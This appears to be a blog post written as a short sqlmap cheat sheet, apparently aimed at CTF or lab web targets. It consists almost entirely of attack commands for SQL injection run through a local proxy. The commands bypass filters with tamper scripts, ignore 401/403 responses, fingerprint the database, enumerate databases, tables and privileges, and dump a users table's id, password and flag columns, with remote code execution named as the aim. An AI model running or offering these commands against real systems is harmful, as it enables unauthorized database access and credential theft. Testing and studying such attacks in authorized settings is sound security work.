1. Request a Https request with a raw text option
Insert ":443" into a Host heaer
POST /test HTTP/1.1
Host: x.y.z:443
2. Run a tool with a time delay & proxy option
sqlmap -r request.txt --proxy=http://127.0.0.1:8080 --delay=0.3
3. Bypass a basic filtering
sqlmap -r request.txt --tamper="between,randomcase,space2comment" --proxy=http://127.0.0.1:8080 --delay=0.3
4. If you find 401 Unauthorized, try to test with the option on SQLmap
sqlmap -r request.txt --ignore-code 401 --proxy=http://127.0.0.1:8080 --delay=0.3
sqlmap -r request.txt --ignore-code=401,403 --proxy=http://127.0.0.1:8080 --delay=0.3
5. Retrieve a Database version & current user to catch CVE related to the database and use a lot of functions on datavase for further exploits(e.g. RCE(this is our goal:)) or LFI etc)
sqlmap -r request.txt -b --current-user --proxy=http://127.0.0.1:8080 --delay=0.3
/*
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
*/
6. Extract prilvileges of users & table & column & data
sqlmap -r raw.txt --dbs --proxy=http://127.0.0.1:8080 --delay=0.3
sqlmap -r raw.txt --tables --proxy=http://127.0.0.1:8080 --delay=0.3
sqlmap -r raw.txt --privileges --proxy=http://127.0.0.1:8080 --delay=0.3
sqlmap -r raw.txt -T users --columns --proxy=http://127.0.0.1:8080 --delay=0.3
sqlmap -r raw.txt -T users -C flag,id,password --dump --proxy=http://127.0.0.1:8080 --delay=0.3
7. timestamp
sqlmap -r text.txt --proxy=http://127.0.0.1:8080 --eval="import time; timestamp=int((time.time() * 1000)+2000)"'HACKING > Web' 카테고리의 다른 글
| Apache Contaminating Log Files = 아파치 로그 오염 공격 (0) | 2022.09.30 |
|---|---|
| Setting#0 Ubuntu환경에서 Docker를 이용한 Dokuwiki 세팅 (0) | 2021.05.26 |
| Node.js#1 Prototype Pollution (0) | 2021.03.22 |
| Node.js#0 Pug Template XSS(Cross Site Scripting) (0) | 2021.03.22 |
